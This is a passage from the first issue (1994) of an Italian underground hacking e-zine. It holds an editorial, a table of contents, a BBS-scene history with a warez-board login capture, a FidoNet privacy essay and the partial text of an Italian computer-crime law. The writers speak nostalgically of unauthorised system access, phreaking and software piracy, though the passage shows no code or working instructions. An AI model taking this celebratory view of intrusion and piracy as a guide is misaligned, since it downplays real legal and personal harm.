Copy Link
Add to Bookmark
Report
The Black Page 00
The Black Page
Numero 0 - Settembre 1994
-
La prima rivista ITALIANA di
H/P/A/V/C/F/C/C
HackingPhreakingAnarchyVirusCodezFuckingCellularCyberpunk
========
Redattore Capo, Editore : * Dupree's Paradise *
* Remacoll's Group *
Co-Redattore : Ice Mc / DTC
Redattori - Collaboratori : Ace
Hitman Italy
----------------------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - ACP:COM
Finalmente e' nata, questa dannata rivista ! Ora, due parole sui motivi
che ci hanno spinto a creare un simile bollettino telematico. Questa rivista
e' destinata ad un pubblico vasto, molto vasto, piu' vasto e' meglio e'. Lo
scopo che ci prefiggiamo con questo bollettino piu' o meno periodico e' quello
di diffondere un tipo di cultura telematica, quella *CREATIVA*, tra la gente
che se ne vuole interessare. Una sorta di contro-corrente informativa in so-
stanza, diretta a chiunque voglia CAPIRE di piu' su quel mondo fittizio che si
trova al di la' delle nostre prese telefoniche.
Speriamo che questa rivista telematica venga letta da tutte le persone
possibili. Qui i System Administrators potranno apprendere come far fronte ai
problemi di sicurezza dei loro sistemi, su come evitare violazioni della sud-
detta sicurezza, come prevenire intrusioni, come risolvere bug di sistemi, ec-
cetera eccetera, grazie ad articoli ed esempi appositamente pubblicati, in mo-
do che possano effettivamente capire dove eventualmente possano sussistere
delle falle nei loro grossi computers. Qui i 'ragazzini intraprendenti' po-
tranno leggere ed imparare cosa vuol dire sicurezza dei sistemi, potranno ca-
pire dove stanno i punti deboli dei piu' svariati tipi di computer, potranno
imparare a utilizzare questi computer, cosa che potrebbe risultare loro molto
utile per un futuro curriculum vitae (Immaginate la differenza di 2 curricu-
lum, uno che riporta "Esperienza di lavoro in ambiente PC-DOS su WordStar 1.0"
ed uno che riporta "Vasta conoscenza dei sistemi MSDOS, VAX-VMS, Unix, espe-
rienza di manutenzione dei suddetti sistemi in particolar modo in relazione
alla sicurezza informatica" ;) ) quando si presenteranno in qualche ditta in
cerca di lavoro. Qui i poliziotti, i finanzieri, e le forze dell'ordine in ge-
nerale, leggendo questi files, forse potranno capire realmente come stanno le
cose in fatto di Pirateria, Accessi non autorizzati, Virus, e forse troveranno
anche delle soluzioni ai loro problemi. Qui i Cyberpunk, gli Anarchici, i Di-
versi, e tutte le persone con una forte apertura mentale in genere potranno
trovare articoli fatti per loro, o DA LORO STESSI, se vorranno collaborare in-
viando materiale.
Questa rivista e' totalmente gratis, distribuibile su qualsiasi network.
In questa rivista NON VENGONO ASSOLUTAMENTE PUBBLICIZZATI codici di accesso
illegali a qualsiasi sistema, ne' carte di credito personali, ne' NIENTE che
possa essere direttamente utilizzabile PER SCOPI ILLECITI. Su questa rivista
spesso troverete articoli espliciti su svariati generi di cose, dai Virus, al-
le Droghe, alle Armi, a tutto quello che potete immaginare. Queste informazio-
ni pervengono alla nostra redazione da piu' fonti : Donazioni, Messaggi di po-
sta elettronica, Lettere, Voci, Discussioni con amici o estranei, colloqui con
barboni per la strada, ma anche libri o riviste facilmente reperibili. Se que-
ste cose esistono nella comune stampa, crediamo di essere nel giusto pubbli-
candole a modo nostro nella nostra rivista gratuita. Quindi per favore, non
venite a romperci le palle dicendo che pubblichiamo virus o cazzate del gene-
re. Pubblicheremo inoltre spesso dei trucchi di programmazione che permette-
ranno di fare svariate cose con un computer, sia esso un Atari PC-Folio o un
VAX della Digital.
Inoltre daremo voce e spazio a chiunque abbia qualcosa da dire. Per questo
sproniamo chiunque voglia contattarci, a farlo al piu' presto possibile. Dare-
mo spazio ad articoli sulla realta' Cyberpunk Italiana, a poesie e composizio-
ni, a pubblicita' gratuite di bbs varie, insomma a quello che vorremo. Date
sfogo alla vostra fantasia ! Mandateci materiale !
Qualsiasi cosa che manderete verra' pubblicata SENZA VELI O CENSURE cosi' come
viene ricevuta, tranne diversi accordi presi con gli autori. I "crediti" per
tali articoli ricadranno esclusivamente sugli autori. In fondo, noi non pos-
siamo far altro che prendere dei file ed incollarli insieme :)
Bene, adesso e' ora di iniziare.
=============================================================================
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Indice generale
INDICE DEGLI ARGOMENTI TRATTATI
-------------------------------
In questo numero si parla di :
------------------------------
[1] Un pochino (ma molto poco) di STORIA
a cura della Redazione
[2] RETI NEL CICLONE
a cura di ACE
[3] FIDO BUST : Articoli, commenti, stronzate
*[4] THE fingerd TROJAN HORSE
by Hitman Italy
*[5] MINCHIA.MAR, simpatico programmino in
Assembler x VAX, scritto alle 5 del mattino
by Dupree's Paradise
[6] DOVE/COME/QUANDO/PERCHE' FARE TRASHING
di Ice MC
L'arte di scavare nell'immondizia per
cercare cose carine :)
[7] L'angolo SIP-TELECOM, Notizie fresche di
cassonetto a cura di Ice MC e Dupree's
[8] MARIA JUANA : Canapa Indiana, che sollievo
da un articolo apparso su "Il Manifesto"
a cura della Redazione
[9] ARMI E BAGAGLI : Facciamo Casino con poco
a cura della Redazione
[10] CYBERSPACE - Articolo Mai Pubblicato
di Luc Pac (from Decoder BBS)
[11] LEONCAVALLO !!! SOLIDARIETA' !!!!!!
Le Notizie che allo Stato non conviene far
trapelare ...
Fonti : ECN, messaggi su Decoder BBS
[12] BSA : Un commento letto su Decoder BBS
di M F B
*[13] PGP CHAT : Un po' un casino, ma un buon
spunto per sentirsi protetti
from Decoder BBS
[14] LE "NUOVE" TARIFFE ITAKAZ
*[15] STRONZATE IN RETE
a cura della Redazione
* = Articoli tutti o in parte in lingua Inglese.
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 1
======================================
= =
= Panoramica sulla scena Telematica =
= Underground Italiana ed Europea =
= =
= by =
= * Dupree's Paradise * =
= =
======================================
Questo articolo e' stato realizzato in collaborazione con le seguenti brave
persone : NESSUNO.
Bene, questa e' proprio la parte difficile. Parlare della scena italiana
in un momento come questo e' una cosa strana e anche un po' difficile. Certo
sono ormai passati i tempi d'oro in cui era abbastanza facile circolare nelle
reti, c'era abbondanza di password e di sistemi, che da un anno e mezzo a que-
sta parte pero' cominciano a mancare.
Comunque, vogliamo provare a tracciare una panoramica della scena italia-
na ? Beh, allora direi che ci vuole un po' di "storia" ... iniziando dal pas-
sato, dalle prime BBS, i primi gruppi e tutte 'ste cazzate qua. Vi assicuro
che e' stato un lavoro da pazzi andare a beccare tutti i diretti interessati e
sentire i loro commenti ... almeno accendetemi un cero per onorarmi, oppure se
volete recitate pure tutto il PRCD in piedi aull'altare di una chiesa, comple-
tamente nudi :))))))))
Come non iniziare parlando del mitico Pier's Group ? Chi di voi lettori
non ha mai letto i racconti di Twin Phreacks, farebbe bene a scaricarseli su-
bito, dalla bbs DECODER, 02-29527597, aperta dalle 14 alle 8 del mattino. Li'
ci sono proprio tutti ! Scritti dal mitico MF The Best, sono veramente esila-
ranti.
Beh, secondo il mio MODESTISSIMO parere, che sicuramente trovera' molte
persone contrarie, il Pier's e' uno dei mitici gruppi che hanno segnato la
scena italiana in campo HP, con la loro ormai leggendaria BBS. L'ambiente era
veramente strano, particolare, la famosa "Area 7" in cui solo gli Elite pote-
vano entrare era una cosa (per quei tempi) allucinante, in cui si trovavano
chicche provenienti dagli USA.
Del Pier's abbiamo recuperato giusto qualche capture, di cui vi spariamo
qui qualcosa :
-------------------------------CAPTURE START--------------------------------
atd
CONNECT 1200
CONNECT 1200/NONE
Welcome to AmiExpress BBS Version 1.1x
You are connected to Node 0 at 1200 baud.
Connect time is Thu May 07 14:28:45 1992
ANSI graphics (Y/n)? N
__ ____________________
_____ __ _____________ / /\ ______ / \
/ ___ \ / // ______ ___ \ /_/ / / ____/\ | E l i t e B B S |
/ /__/ // // /___ / /__/ /\ \_\/ / /____\/ \____________________/
/ /____// // ____/\/ / __/ / /___ /\
/ /\____/ // /____\/ / \ \_\/ _____/ / /
/_/ / /_________//_/ / \_\ /______/ /
\_\/ \_________\\_\/ \_\ \______\/ /\
_______ _____ __________ __ _____ S E L E C T E D
/ _____// ___ \ / ___ _ /\ / // ___ \ / \
/ /____ / /__/ /\/ /\_/ // / // // /__/ /\ U S E R S O N L Y
/ //_ // / __/ / / // // / // // /____/ / / \
/ /__/ // / \ \_\/ /_// // /_// // /\____\/ /__________\
/______//_/ / \_________/ \_____//_/ /
\______\\_\/ \________\/ \____\\_\/
Sistema Privato per lo Scambio di Files/Messaggi Sede di MILANO (Node0)
Aperto 24 ore su 24, 365 giorni/anno. BAUDRATES da 300 a 14400 BPS V42bis.
SysOp and Supreme God : M F T H E B E S T
Powerful Chat Lord : P I E R
The Immortal CoSysOp : E N I A C
The L e a d e r ! : P I X I E
Enter your FULL Name: Xxxxxx'x Xxxxxxxx
PassWord: ????????
__
/ /
__ /_/_____ __ ______ _______ ______
\ \ // _____/ / / / ____// ___ / /\ / ____/
\ \ /\ // /___ / / / / / / / / / \/\ / /___
\ \ / \ / \ __/ / / / / / / / / / /\ \\ __/
\ \/ /\ \/ / \ \____\ \____\ \____\ \__\ \ \ \ \/\ \\ \____
\ / \ / \_____\\_____\\_____\\______\ \ \ \_\\_____\
\/ \/ _________________________________\ \
/____________________________________\
A c c e s s o R e g o l a r e A u t o r i z z a t o
HandShake : 14.4 KiloBauds HST V42bis
Software : AmiExpress V1.1x , 9 Conferences
Data Transfer : Zmodem Protocol: 9600 / 14400 BPS Only
HardWare : A3000 Tower - CPU 68030 - 5 Megabytes RAM
DATA STORAGE : Multi-HD System, 940 MegaBytes Online
(Pause)...Space to Resume:
Scanning Conference: Guru's Temple.....No mail today!
Scanning Conference: MS-DOS Warez.....No mail today!
(123456789)
Conf Access: XX_X_XXXX
Caller Num.: 5738
Lst Date On: 05-03-92
Security Lv: 10
# Times On : 6
Ratio DL/UL: 2/1
# Downloads: 1
# Uploads : 3
Bytes DL'd : 58020
Bytes UL'd : 20000000
Bytes Avail: 30000000
Conference 9: MS-DOS Warez Auto-ReJoined
Highest Msg: 507
L/Msg. Read: 0
L/Msg. Auto: 507
Searching for LOSS CARRIER Files!
/---------------------------\
| PIER'S GROUP BBS |
\---------------------------/
C: Comment to Sysop D: Download files
E: Enter Message F: File Listings
G: Goodbye (logoff) H: Display Help
J: Join a conference N: New files since a date
O: Operator page. (Chat) R: Read Messages
S: Your statistics U: Upload files
UR: Upload resume V: View a Text file
W: W(Edit) your stats X: Expert toggle
Z: Zippy search for text T: Local Time
?: This Menu ZOOM: Zoom Mail (See Help File)
M: - Change ANSI Mode
Pier's Group BBS [9:MS-DOS Warez] Menu (27 mins. left): j
_____ _____ _ _ _____ _____ _____ _____ _ _ _____ _____ _____
*****| *****| *|_ *| *****|*****| *****| *****| *| *| *****| *****| *****|
*| *| *| **|_*| *|_ *|_ *|__*| *| **| *| *| *|_ *|___
*| *| *| *|*|*| ***| ***| *****| ***| *|*|*| *| ***| *****|
*|___ *|__*| *| **| *| *|___ *|*| *|___ *| **| *|___ *|___ ____*|
*****| *****| *| *| *| *****| *| *| *****| *| *| *****| *****| *****|
1. LAMERLAND - New Users
2. BEST AMIGA W A R E Z
3. ..NOT READY.......
4. CONSOLE FILES ONLY ! .
5. ....NOT READY.....
6. Cyberpunks' PHREAKING
7. The Segret Nest!
8. Sysops' Utilities
9. MS-DOS W A R E Z
Conference Number: 7
Joining Conference: The Secret Nest
User who have access to Conf #7
______________________________________________________________________________
>-hacker-> Andrea Belli Astaroth
Axe! Bluelight Burglar
Capitan Uncino DEATHBRINGER DIRECT
Dr.Creator Dupree's Paradise Eniac
FLASH GORDON Federica GORDON GEKKO
Genius goblin H.D.Case Hydra
Ironside/tdt Jettero Heller Josh
Longobard Lost found MF THE BEST
Madman MarVin SR! Mark Anders
NCS POISON Phoenix
PiXiE Pier Pitagora
RED MUSTANG Remacoll SCSI
SEVEN /\/\ SIMONE NASA SUSPIRIA
Silver Spring Spider Splatter
TIMESCAPE TRON Tom-cat
Ugo Belli Vale Baggins Yosh
ZEN _/ane
______________________________________________________________________________
(Pause)...Space to Resume:
Highest Msg: 527
L/Msg. Read: 490
L/Msg. Auto: 527
Pier's Group BBS [2:AMIGA Warez ] Menu (8 mins. left): j 8
Joining Conference: Guru's Temple
TOP MESSAGE WRITERS
Nr: Name: Group/Location: Msgs: Calls:
1 MF THE BEST Twin Phreaks 2281 1135
2 Jettero Heller MILANO! 1318 463
3 The Brain --> Five Aces <-- 876 274
4 Hydra Strange Land 532 94
5 SHADOWMAN << CHRONOS >> 503 270
6 SUSPIRIA BOLOGNA 306 542
7 FRANCO2 ROMA,ITALY 185 464
8 FLASH GORDON MILANO 185 229
9 Ugo Belli Milano ( Arese ) 179 45
10 alphabit Milano 172 214
Last Update: 05-02-92 11:38:55
-------------------------------END OF CAPTURE-------------------------------
Bei tempi quelli ! Tempi in cui, se uno veniva scoperto a boxare per soli
20 km di distanza, veniva deletato dalla board immediatamente ... tempi in cui
ogni upload-download doveva venire approvato ... tempi in cui si limitava al
massimo qualsiasi sputtanamento di info, cosa che invece oggi e' ai massimi
livelli, infatti non funge + un emerito cazzo. Ma comunque, certamente Pier's
non era l'unica BBS in Italia ad avere un simile ambiente, ma altre cosi' se-
rie non me ne ricordo. E se qualche stronzo mi avesse spedito del materiale,
invece di continuare a chiedermi "ma ra rivista quando esce" o "ma se ci scri-
vo solo io allora niente" adesso non stareste li' a dire "ma questo qui di re-
censione non ha scritto un cazzo, c'erano un mare di altri gruppi". La prossi-
ma volta invece di star li a farvi le seghe su Arky mandate del materiale !
Piuttosto se riscontrate delle stronzate mandatemi una mail dove volete,
alla fine della mag ci sono tutti gli indirizzi.
Ma comunque, gia' dalla schermata del Pier's si evince che c'era qualche
gruppo. gli INC, i Twin Phreacks (ma esistevano realmente?), i TDT ed altri,
di cui pregherei chiunque ha info di scrivermi una mail colle memberlist e le
attivita'. Ricordiamo ad esempio gli Omega Team che hanno scritto l'ormai fa-
mosa Box per Soundblaster, ma chi fossero i componenti, non se lo ricorda nes-
suno.
Oggi la scena e' ricoperta di gruppi piu' o meno vari. Ci sono i Techno-
Brains, che ora non si sa + che cazzo fanno perche' pare che abbiano subito
anche loro una inculata dal Fidobust, ma non vorrei sparar cazzate. Ci sono un
casino di gruppi vari, ma siccome nessuno mi ha aiutato non posso star qui da
solo ad enumerarli tutti.
E comunque oramai i tempi sono cambiati. Non si puo' fare + un cazzo, o
quasi. Faremmo bene, noi "vecchi", a rivederci qualcuno dei vecchi capture,
per raccogliere lo spirito di quei tempi andati, in cui si lavorava con soli-
darieta', e con uno spirito molto diverso da quello, di merda, che riempie
molte bbs di oggi, in cui non si trova piu' niente oltre a giochini del cazzo
per Amiga e IBM.
Rimandiamo al prossimo numero per un articolo piu' esauriente sulla pano-
ramica italiana. INVITIAMO PERTANTO TUTTI I GRUPPI ITALIANI E NON CHE VOGLIONO
FAR PARTE DELLA NS RECENSIONE STORICA A FARCI PERVENIRE UN MESSAGGIO RELATIVO
AL LORO GRUPPO, INDICANDO IL NOME, I MEMBRI, LE DATE DELLE FORMAZIONI, L'ATTI-
VITA' DEL GRUPPO, EVENTUALI AZIONI MITICHE COMPIUTE DAL GRUPPO (HACKERAGGI,
PROGRAMMI CREATI, DEMO, ECC.) ED ALTRO, AGLI INDIRIZZI DI POSTA ELETTRONICA
RIPORTATI IN CODA AL FILE. IL PGP E' OVVIAMENTE OBBLIGATORIO :)
Dupree's Paradise
-----------------------------------------------------------------
PUBBLICITA' REGRESSO
====================
D E C O D E R
B B S
CyberNet INFORMATION FidoNet
WANT
65:1200/1 TO BE 2:331/369
FREE
Orari apertura 14:00 - 08:00
SUPPLEMENTO ELETTRONICO
RIVISTA INTERNAZIONALE UNDERGROUND
DECODER
a cura della ShaKe Edizioni
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 2
--------------------
- Reti nel ciclone -
--------------------
a cura di
Ace
-
Questo articolo vuole essere l'introduzione ad una serie piu' lunga e
complessa che si sviluppera' attraverso i prossimi numeri di TBP (se ci
saranno :-). Oggetto delle nostre attenzioni saranno le reti di
messaggistica amatoriali come FidoNet (ma non solo).
Iniziamo con una premessa dedicata a chi, vivendo probabilmente su Marte,
non conosce il fenomeno.
FidoNet e' una rete amatoriale (ovvero gestita per passione e non a scopo di
lucro), di bbs che nottetempo si scambiano pacchetti di messaggi seguendo
tutta una serie di procedure note come "Fidonet Tecnology" e su cui non ci
soffermeremo (se vi interessa procuratevi il file FidoNet.man).
Il net (alias rete) offre una serie di aree messaggi ove gli utenti possono
inserire i propri interventi e leggere quelli degli altri. I temi vanno
dalle chiacchere generiche alle aree tecniche dedicate a sistemi hardware,
programmazione, hobby etc. Sulla scia di FidoNet sono nate nel corso degli
anni altre reti, alcune sempre generiche ed altre orientate a particolari
tematiche come ad esempio le italiane PeaceLink (attivita' sociali,
pacifismo, lotta alla mafia, etc), LudoNet (giochi), AmigaNet (Amiga Rulez!).
La rete piu' estesa resta comunque Fido che, nata nel 1987 in USA, conta
ormai nodi in tutti i continenti! A noi questo pero' non interessa poiche'
intendiamo occuparci solo della realta' di casa nostra :-)
Quasi tutti i net prevedono una policy ("politica") che descrive gerarchia
della rete, norme di comportamento, pene per chi le infrange e molto altro.
Chiodo fisso per la maggior parte dei net, ma soprattutto per Fido, e' la
condanna assoluta della pirateria del software, cosa che avveniva anche prima
che in Italia esistesse una vera legge in merito (il che e' abbastanza
esilarante per la verita').
Nulla di male comunque. Se una cosa viene definita illegale chi vuole
promuoverla deve evitare di coinvolgere coloro che invece non gradiscono. Il
problema e' un altro: con la "scusa" di prevenire azioni illecite Fido tende
a ridurre a zero la liberta' personale dei singoli utenti.
Premesso che la rete e' composta da molti bravi e volonterosi Sysop attivi
con l'unico scopo di divertirsi e diffondere gratuitamente la cultura del
dialogo telematico tra le gente, in net si trovano anche elementi con scopi
diversi.
La gerarchia di rete consente di raggiungere un limitato (ma pur sempre
effettivo) potere decisionale sulle azioni del prossimo e cio' non puo' che
attirare chi, oltre alle chiacchere via modem, cerca il comando (o la
dittatura).
Fra le tante belle idee di queste persone (che per selezione naturale tendono
a conquistare la maggior parte dei ruoli di coordinamento) vi e' l'assoluto
annullamento della privacy personale.
Ogni rete ha (forse e' meglio dire avrebbe), un'area privata, abitualmente
chiamata matrix o NetMail, dove gli utenti possono scambiarsi messaggi che
interessano solo mittente e destinatario. Bene, in FidoNet (non solo li,
comunque) quest'area non e' privata ma viene letta praticamente dai Sysop di
TUTTI i nodi attraverso cui il messaggio transita (perche' transita? Perche'
se da MI scrivo ad un utente di NA il msg passa per una serie di BBS
intermedie prima di arrivare a destinazione, ma anche per questo vale il
consiglio di prima: leggetevi Fidonet.man!).
Perche' questo monitoraggio? Semplice: pericolo di eversione (!!!) o
svolgimento di attivita' illegali tramite la rete. Dunque i Sysop sono
tenuti a controllare tutti i messaggi in transito per accertarsi che non
contengano informazioni vietate dalla Policy. L'utilizzo di programmi come
PGP (un crypter talmente potente che neppure la RSA americana e' stata in
grado di decifrare i files da esso generati!) comporta l'immediata escluaione
del bbs (del bbs, non dell'utente!) dalla rete. La paura fa 90...
Ma paura di cosa? Qui viene il bello: i Signori dovrebbero preoccuparsi di
quel che impongono attualmente, non di improbabili utilizzi eversivi della
matrix!
Per la legge italiana ognuno e' responsabile di quel che si trova sul suo
hard disk. (lo so, e' assurdo ma andate a vedere chi e' il NOTO ESPERTO
INFORMATICO che se l'e' inventato).
Dunque, se domani il Signor Vertigo, tanto per fare un nome a caso (e' il RC
di Fido per l'Italia), leggesse il mtx di un tizio che comunica ad un amico
il piano per assaltare la sede della BSA, diventerebbe automaticamente
complice dei due a meno di non sporgere immediata denuncia, cosa improbabile
in quanto un file di testo ha poco valore come prova poiche' facilmente
falsificabile.
In questo senso sarebbe molto piu' sicuro per i Sysop stessi non solo evitare
la lettura dei messaggi privati ma addirittura farli transitare cryptati via
PGP o programma similare che in caso di bisogno consenta di dimostrare
(compatibilmente con la conoscenza informatica dei magistrati), la forzata
estraneita' del Sysop o, ancora meglio, impedisca proprio di scoprire il
contenuto (eversivo :-) del messaggio.
Un altro interessante spunto di analisi e' la recente legge 547 sulla
telematica che estende la privacy postale ai messaggi elettronici. Secondo
le interpretazioni dei Sysop di rete (che valgono quanto quelle della BSA
sulla legge 518 relativa alla pirateria del software :-) questa non influisce
assolutamente sul Sacro Diritto di leggere le matrix poiche' in policy e'
chiaramente spiegato che per Fido il termine "privato" ha un significato
abbastanza diverso da quello normale (!), riguarda infatti la possibilita' di
far leggere il proprio messaggio non a tutti ma esclusivamente a destinatario
ed... ai Sysop di tutti i nodi su cui passa (ero stufo di usare 'transita'
:-)
Nel prossimo numero (se ci sara') riferiro' gli esiti di una piccola ricerca
legale che sto svolgendo in merito visto che le dichiarazioni di cui sopra
non mi convincono affatto.
Se cio' che ipotizzo verra' confermato saremo di fronte ad una gravissima
limitazione della Nostra Liberta' Personale punibile a norma di legge, senza
contare poi i rischi, descritti in precedenza, che i Sysop corrono
quotidianamente.
A questo punto pero' tengo a precisare che ne io ne chi mi sta aiutando a
svolgere questa inchiesta intendiamo distruggere Fido o far finire nei guai
chichessia.
FidoNet e' un grande patrimonio collettivo. La presenza di soggetti
parzialmente negativi non deve influire sull'indubbia utilita' della rete.
L'inchiesta che stiamo svolgendo vuole solo chiarire come stanno le cose e
capire se in net il rispetto delle leggi comprende solo la 518 o va anche
oltre.
Io utilizzo regolarmente FidoNet per quel che mi offre. Sogno di riuscire a
cambiare certe assurdita' (non solo la privacy negata) ma in caso contrario
non mi disperero' di certo anche perche' per i miei msg *privati* ho mezzi
ben piu' sicuri ;-)
Bene, vi lascio con una piccola curiosita': la privacy, assente per i
matrix, e' invece assoluta per tutte le aree di coordinamento. Pensate solo
che un umile CoSysop (che per DEFINIZIONE ha gli stessi poteri del Sysop) per
accedervi deve addirittura inviare copia dei suoi dati (reali) a RC e REC, i
quali, secondo metodi di giudizio personali, decideranno se la persona e'
gradita o meno. In piu' chiunque acceda a tali aree (dove si vocifera
circolino segreti di Stato importanti per la stabilita' Democratica della
nazione) deve mantenere assoluto riserbo su quanto apprende, pena l'immediata
esclusione dalla rete del BBS ed altri provvedimenti... alcuni citano
l'evirazione, ma sono solo voci non confermate :-)
Note e legenda
--------------
Fidonet.man - e' un testo disponibile in molti BBS ed allegato agli archivi
dei principali mailer e tosser (programmi per point e bbs).
Se non lo trovate leggetevi la policy Fido che chiarisce
ugualmente vari meccanismi di rete. Nei prossimi numeri, se
possibile, ne analizzeremo insieme le parti piu' significative.
BSA - associazione cui aderiscono varie sw houses.
Si batte contro la pirateria del software. Se volete
un'interpretazione obiettiva e aperta della 518 rivolgetevi
pure a loro. Probabilmente vi diranno che anche sognare
windows (bhe e' piu' un incubo che altro...) piratato e'
illegale :-)
MTX - Vedi matrix.
RC - Regional Coordinator, il responsabile italiano per FidoNet.
Per contattarlo matrixate a 2:331/301 c/o Vertigo.
REC - Regional Echo Coordinator, il responsabile della gestione
(apertura, chiusura, etc) aree echo. Il REC in carica, Adolfo
Melilli, alloggia al 2:333/1.
Con questo dovrebbe essere tutto. Saluti e alla prossima!
Quasi dimenticavo: se volete contattarmi potete farlo lasciandomi un
messaggio nella CPE di Edi BBS (X25 22950135 NRC) oppure via matrix presso:
2:331/368 (FidoNet, se volete che il vostro messaggio sia pubblico :-)
65:1200/7 (CyberNet, gia' piu' sicuro)
Ci sarebbero altri 10 indirizzi ma penso che questi bastino!
Bye!
Ace
[ N.d.r in relazione alla BSA e al (C) software vi consigliamo di
leggere attentamente l'articolo 12 ;) ]
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 3
-------------------------------
- F I D O B U S T -
-------------------------------
The Fidonet CrackDown
by
Dupree's
(e che cazzo volete ? nessuno mi ha aiutato)
E proprio perche' nessuno mi aiuta mi limitero' a postare qui alcuni mes-
saggi catturati qua' e la', alcuni conosciuti, altri meno. Beccatevi sta ca-
terva di bytes. Spero solo di avere piu' collaboratori per il prossimo numero.
Mi rompe i coglioni fare tutto da solo. Fanculo il mondo.
Incominciamo col il testo della famigerata e bastardissima "legge" ...
---------------------------------------------------------------------------
LEGGE 23 Dicembre 1993, n.547
Modificazioni ed integrazioni alle norme del codice penale e del
codice di procedura penale in tema di criminalita' informatica.
La Camera dei Deputati e il Senato della Repubblica hanno approvato;
Il Presidente Della Repubblica Promulga
la seguente legge:
Art. 1
1.- All'articolo 392 del codice penale, dopo il secondo comma e' aggiunto
il seguente:
Si ha, altresi', violenza sulle cose allorche' un programma informatico
viene alterato, modificato o cancellato in tutto o in parte ovvero viene
impedito o turbato il funzionamento di un sistema informatico o telematico.
Art. 2
1.- L'articolo 420 del codice penale e' sostituito dal seguente:
Art. 420 (Attentato a impianti di pubblica utilita').- Chiunque
commette un fatto diretto a danneggiare o distruggere impianti di pubblica
utilita', e' punito, salvo che il fatto non costituisca piu' grave reato,
con la reclusione da uno a quattro anni.
La pena di cui al primo comma si applica anche a chi commette un fatto
diretto a danneggiare o distruggere sistemi informatici o telematici di
pubblica utilita', ovvero dati, informazioni o programmi in essi contenuti
o ad essi pertinenti.
Se dal fatto deriva la distruzione o il danneggiameno dell'impianto o
del sistema, dei dati, delle informazioni o dei programmi ovvero
l'interruzione anche parziale del funzionamento dell'impianto o del sistema
la pena e' della reclusione da tre a otto anni.
Art. 3
1.- Dopo l'articolo 491 del codice penale e' inserito il seguente:
Art. 491-bis (Documenti Informatici).- Se alcuna delle falsita'
previste dal seguente capo riguarda un documento informatico pubblico o
privato, si applicano le disposizioni del capo stesso concernenti
rispettivamente gli atti pubblici e le scritture private. A tal fine per
documento informatico si intende qualunque supporto informatico contenente
dati o informazioni aventi efficacia probatoria o programmi
specificatamente destinati ad elaborarli.
Art. 4
1.- Dopo l'articolo 615-bis del codice penale sono inseriti i seguenti:
Art. 615-ter (Accesso abusivo ad un sistema informatico o
telematico).- Chiunque abusivamente si introduce in un sistema informatico
o telematico protetto da misure di sicurezza ovvero vi si mantiene contro
la volonta' espressa o tacita di chi ha il diritto di escluderlo, e' punto
con la reclusione fino a tre anni.
La pena e' della reclusione da uno a cinque anni:
1) Se il fatto e' commesso da un pubblico ufficiale o da un
incaricato di pubblico servizio, con abuso dei poteri o con la
violazione dei doveri inerenti alla funzione o al servizio, o da
chi esercita anche abusivamente la professione di investigatore
privato, o con abuso della qualita' di operatore di sistema;
2) Se il colpevole per commettere il fatto usa violenza sulle cose
o alle persone, ovvero se e' palesemente armato;
3) Se dal fatto deriva la distruzione o il danneggiamento del
sistema o l'interruzione totale o parziale del suo funzionamento,
ovvero la distruzione o il danneggiamento dei dati, delle
informazioni o dei programmi in esso contenuti.
Qualora i fatti di cui ai commi primo e secondo riguardino sistemi
informatici o telematici di interesse militare o relativi all'ordine
pubblico o alla sicurezza pubblica o alla sanita' o alla protezione civile
o comunque di interesse pubblico, la pena e', rispettivamente, della
reclusione da uno a cinque anni e da tre a otto anni.
Nel caso previsto dal primo comma il delitto e' punibile a querela
della persona offesa; negli altri casi si procede d'ufficio.
Art. 615-quater (Detenzione e diffuzione abusiva di codici di accesso
a sistemi informatici o telematici).- Chiunque, al fine di procurare a se o
ad altri un profitto o di arrecare ad altri un danno, abusivamente si
procura, riproduce, diffonde, comunica o consegna codici, parole chiavi o
altri mezzi idonei all'accesso ad un sistema informatico o telematico,
protetto da misure di sicurezza, o comunque fornisce indicazioni o
istruzioni idonee al predetto scopo, e' punito con la reclusione sino ad un
anno e con la multa sino a lire dieci milioni.
La pena e' della reclusione da uno a due anni e della multa da lire
dieci milioni a venti milioni se ricorre taluna delle circostanze di cui ai
numeri 1) e 2) del quarto comma dell'articolo 617-quater.
Art. 615-quinques (Diffusione di programmi diretti a danneggiare o
interrompere un sistema informatico).- Chiunque diffonda, comunica o
consegna un programma informatico da lui stesso o da altri redatto, avente
scopo o per effetto in danneggiamento di un sistema informatico o
telematico, dei dati o dei programmi in esso contenuti o ad esso
pertinenti, ovvero l'interruzione, totale o parziale, o l'arterazione del
suo funzionamento, e' punto con la reclusione sino a due anni e con la
multa sino a lire venti milioni.
Art. 5
1.- Nell'articolo 616 del codice penale in quarto comma e' sostituito dal
seguente:
Agli effetti delle disposizioni di questa sezione, per "corrispondenza"
si intende quella epistolare, telegrafica, telefonica, informatica o
telematica ovvero effettuata con ogni altra forma di comunicazione a
distanza.
Art. 6
1.- Dopo l'articolo 617-ter del Codice penale sono inseriti i seguenti:
Art. 617-quater (Intercettazione, impedimento o interruzione illecita
di comunicazioni informatiche o telematiche).- Chiunque fraudolentemente
intercetta comunicazioni relative ad un sistema informatico o telematico o
intercorrenti tra piu' sistemi, ovvero le impedisce o le interrompe, e'
punto con la reclusione da sei mesi a quattro anni.
Salvo che il fatto non costituisca pii' grave reato, la stessa pena si
applica a chiunque rivela, mediante qualsiasi mezzo di infoamzione al
pubblico, in tutto o in parte, il contenuto delle comunicazioni di cui al
primo comma.
I delitti di cui al primo e secondo comma sono punibili a querela della
persona offesa.
Tuttavia si procede d'ufficio e la pena e' della reclusione da uno a
cinque anni se il fatto e' commesso:
1) in danno a un sistema informatico o telematico utilizzato dallo
Stato o da altro ente pubblico o da impresa esercente servizi
pubblici o di pubblica necessita';
2) da un pubblico ufficiale o da un incaricato di pubblico
servizio, con abuso dei poteri o con la violazione dei doveri
inerenti alla funzione o al servizio, ovvero con abuso della
qualita' di operatore di sistema;
3) da chi esercita anche abusivamente la professione di
investigatore privato.
Art. 617-quinques (Installazione di apparecchiature atte a
intercettare, impedire od interrompere comunicazioni informatiche o
telematiche).- Chiunque, fuori dai casi consentiti dalla legge, installa
apparecchiature atte ad intercettare, impedire o interrompere comunicazioni
relative ad un sistema informatico o telematico ovvero intercorrenti tra
piu' sistemi, e' punto con la reclusione da uno a quattro anni.
La pena e' della reclusione da uno a cinque anni nei casi previsti dal
quarto comme dell'articolo 617-quater.
